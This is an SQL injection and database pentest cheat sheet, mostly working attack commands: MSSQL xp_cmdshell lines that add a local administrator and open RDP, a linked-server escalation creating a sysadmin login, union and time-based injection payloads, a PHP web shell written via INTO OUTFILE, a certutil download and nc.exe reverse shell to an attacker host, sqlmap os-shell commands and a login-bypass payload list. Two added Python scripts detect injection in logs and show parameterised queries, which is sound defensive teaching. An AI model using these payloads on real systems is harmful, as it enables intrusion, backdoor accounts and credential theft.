
SQL DB & SQL Injection Pentest Cheat Sheet


1) MSSQL Injection Cheat Sheet | pentestmonkey

2) xp_cmdshell | Red Team tales

3) PentesterMonkey SQL Injection Cheatsheet

Use dbeaver for GUI Access

4) SQL Injection Explanation | Graceful Security

Common Ports

Microsoft SQL:
1433/TCP (default listener)
1434/UDP (browser service)
4022/TCP (service broker)
5022/TCP (AlwaysOn High Availability default)
135/TCP (Transaction SQL Debugger)
2383/TCP (Analysis Services)
2382/TCP (SQL Server Browser Service)
500,4500/UDP (IPSec)
137-138/UDP (NetBios / CIFS)
139/TCP (NetBios CIFS)
445/TCP (CIFS)

Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP

MongoDB:
27017,27018,27019/TCP


PostgreSQL:
8432/TCP

MySQL:
3306/TCP

SQL DB Enum with nmap:

nmap -p 1433 --script ms-sql-info --script-args mssql.instance-port=1433 IP_ADDRESS

nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"

nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add"

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.10

MSSQL/MYSQL DB Login Bruteforce

git clone https://github.com/m8r0wn/enumdb.git
cd enumdb
python3 setup.py install
#Download the wordlist from SecLists
cat mssql-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat mssql-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txt
#Port is optional
#-t = mysql or mssql; mssql port 1433/1434; mysql port - 3309
#-U = users.txt, -u = username; -P = passwords.txt, -p = password
enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v
SQSH usage:

sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'

\go

EXEC xp_cmdshell 'net localgroup administrators bhanu /add'

\go

MssqlClient


Exploiting From Windows with Explanation - Nikhil Mittal

#Enumeration using Metasploit
auxiliary(admin/mssql/mssql_enum)

mssqlclient.py username@10.10.10.10

#Run arbitrary commands
xp_cmdshell whoami

#View Version
SELECT @@version

#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();


#List Users

SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

#Enum Privs

SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#Show Servername
select @@servername

#Show linked servers
select * from sysservers;   
select name from sysservers;

#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];
#Find the username from which we can run commands on the server
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];

#Check sysadmin accounts on the server/DB

EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];

#Check your permissions on the server
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];

#Running command as a linked server using the server that we have permissions on

EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#View the permissions you have on the linked database.

EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as another user multiple times
EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

#Login as the new user
mssqlclient.py newuser@10.10.10.10
P@$$w0rd123

#List Databases
SELECT name FROM master..sysdatabases;

#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]

select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;

#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';

#Abusing Xpdirtree

Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1'   /Breaks the statement (the resulting error reveals the injection point)
website.com/comment.php?id=738 order by 1 /ORDER BY the first column of the underlying SELECT query
website.com/comment.php?id=738 order by 7 /Increase the column number until an error appears
      /This statement broke at 7, so the query has only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
  /UNION (ALL) is used to combine 2 or more SELECT statements; the column count must match
  /Wherever a number is echoed in the page is a column suitable for enumeration, here 5

website.com/comment.php?id=738 union select 1,2,3,4,@@version,6  /MySQL version

website.com/comment.php?id=738 union select 1,2,3,4,user(),6  /Current user

website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
     /Prints all of the table names in the database

website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
     /Extract the column names of the users table

website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users
     /Read the name and password columns through the echoed positions



ERROR BASED SQL Injection: SQLLITE
==================================

http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;

http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;

search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--;           # Get all table names in sqlite_master db

search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--;                 #Get usernames and passwords            
TIME BASED SQL INJECTION:
--------------------------
In time-based SQL injection, if the injected condition is true the response is delayed by the sleep time;
otherwise it is returned immediately.

website.com/comment.php?id=738-sleep(5)  /Page takes 5 seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
    /Responds after 5 seconds because the condition is true

website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
    /Responds immediately when the condition is false


website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
    /Loading a file from the server

website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'

website.com/backdoor.php/cmd?ipconfig
SQL Command Injection: MSSQL

bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--

admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--

admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe

sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password


If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;



Creating an Admin Account with RDP Access:

aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--

aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--

aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';--

NSE Script for XP_CMDSHELL
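The payloads in the error-based, time-based and MSSQL command-injection sections above leave recognisable traces in a web server's access log. The script below is an added example, not part of the original cheat sheet: it parses Common Log Format lines (the sample lines are constructed), URL-decodes the request target, flags the probe shapes those sections use (ORDER BY column counting, UNION SELECT, SLEEP()/BENCHMARK()/WAITFOR DELAY, xp_cmdshell, LOAD_FILE/INTO OUTFILE, comment terminators and tautologies) and groups the hits per source IP so one client stepping through several probe types stands out.

```python
"""Detect SQL-injection probes in web server access logs.

Added example, not part of the original cheat sheet. The regexes cover the
payload shapes used in the notes above; the log lines in SAMPLE_LOG are
constructed for this example.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# (rule name, pattern applied to the URL-decoded request target)
RULES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("mssql_cmd", re.compile(r"xp_cmdshell|sp_configure|xp_dirtree", re.I)),
    ("file_io", re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I)),
    # closing quote/paren, optional ';', then a MySQL/MSSQL comment opener
    ("comment_terminator", re.compile(r"['\)]\s*;?\s*(--|#|/\*)")),
    # OR <x> = <x> with the same literal on both sides ('1'='1, 1=1, "a"="a")
    ("tautology", re.compile(r"\bor\s+['\"]?(\w+)['\"]?\s*=\s*['\"]?\1['\"]?", re.I)),
]


def parse_line(line):
    """Return the decoded request and the rule names it triggers, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m.group("target"))  # %27 -> ', '+' -> space
    hits = [name for name, rx in RULES if rx.search(target)]
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "target": target, "hits": hits}


def scan_log(lines):
    """Return only the records that triggered at least one rule."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["hits"]:
            alerts.append(rec)
    return alerts


def suspects(alerts):
    """Group triggered rules per source IP: a single client moving from
    ORDER BY probes to UNION SELECT to SLEEP() is a far stronger signal
    than one odd request."""
    by_ip = defaultdict(set)
    for rec in alerts:
        by_ip[rec["ip"]].update(rec["hits"])
    return {ip: sorted(rules) for ip, rules in by_ip.items()}


# Constructed sample: 10.0.0.9 works through the probe sequence from the notes,
# the other two clients are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /comment.php?id=738 HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "GET /comment.php?id=738%20order%20by%207 HTTP/1.1" 500 221
10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /comment.php?id=738+union+select+1,2,3,4,@@version,6 HTTP/1.1" 200 640
10.0.0.9 - - [12/Mar/2024:10:01:20 +0000] "GET /comment.php?id=738-sleep(5) HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2024:10:01:45 +0000] "GET /login.php?user=admin%27+or+%271%27%3D%271&pass=x HTTP/1.1" 302 0
10.0.0.9 - - [12/Mar/2024:10:02:01 +0000] "GET /login.php?user=admin%27%3BEXEC+xp_cmdshell+%27whoami%27%3B-- HTTP/1.1" 200 77
10.0.0.7 - - [12/Mar/2024:10:02:30 +0000] "GET /search.php?q=order+forms HTTP/1.1" 200 1200
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for rec in found:
        print(rec["ip"], rec["status"], rec["hits"], rec["target"])
    print(suspects(found))
```

The target is decoded exactly once before matching, which is what the server does too; double-encoded or `/**/`-padded payloads will slip past these regexes, so treat the output as triage input (correlate with 5xx responses and response-time spikes for the time-based probes) rather than as a blocking rule.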

Bypassing Restriction Interfaces:
----------------------------------
Use the Tamper Data Firefox plugin.  /Intercepts POST requests

Start Tamper Data --> input something into the input field, or change the items in the
drop-down.
SQLMAP:
---------

#Skip a parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param_Name

#Test only the specified parameters
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 -p Param1,Param2

#Dump all DB data
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5

#Get a shell
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell

sqlmap --help

sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"

List all the databases:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --dbs

Current User:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-user

Current DB:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-db

Tables:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

Columns:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --columns -T accounts -D owasp10

Dump:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump

OS Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --os-shell

SQL Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --sql-shell
current_user()
user()
database()
select table_name from information_schema.tables where table_schema = 'owasp10'
Methodology

1) Check for login pages - try all special characters

2) F12 --> inspect the page; check for any search functionality like search?q= or id=1, or similar


 

Cheatsheet

admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--

USERNAME: ' or 1/*
PASSWORD: */ =1 --

USERNAME: admin' or 'a'='a
PASSWORD '#

If the database is mysql, try to dump all login info to files?

Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--

union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
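Every tautology and comment payload in the list above works only because the application pastes the input into the SQL text. The script below is an added example, not part of the original cheat sheet: it builds an in-memory SQLite users table (constructed data) and runs the same inputs through a concatenated login query and a parameterised one, so the bypass and its fix can be compared side by side.

```python
"""Concatenated vs. parameterised login query, tested with the payloads above.

Added example, not part of the original cheat sheet. The users table and its
rows are constructed; SQLite is used so the script runs offline.
"""
import sqlite3


def make_db():
    """Create a throwaway users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the input becomes part of the SQL statement.
    Returns the matched names, or None when the input broke the statement
    (the syntax error an error-based tester watches for)."""
    sql = (f"SELECT name FROM users WHERE name = '{username}' "
           f"AND password = '{password}'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return [r[0] for r in rows]


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the values separately from the
    statement text, so quotes and comment markers are just data."""
    rows = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (username, password),
    ).fetchall()
    return [r[0] for r in rows]


# Payloads taken from the cheat sheet list; '#' is a MySQL comment, not SQLite,
# so the '--' variants are the ones that terminate the statement here.
PAYLOADS = ["admin' --", "' or 1=1--", "admin' or '1'='1", "'"]


def compare(conn):
    """Run each payload through both queries; returns {payload: (vuln, safe)}."""
    return {p: (login_vulnerable(conn, p, "wrong"), login_safe(conn, p, "wrong"))
            for p in PAYLOADS}


if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in compare(db).items():
        print(f"{payload!r:22} concatenated -> {vuln}   parameterised -> {safe}")
```

The single quote on its own returns None from the concatenated version because the statement no longer parses, which is exactly the behaviour the error-based section relies on; the parameterised version never errors on input and never returns a row for any of the payloads.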
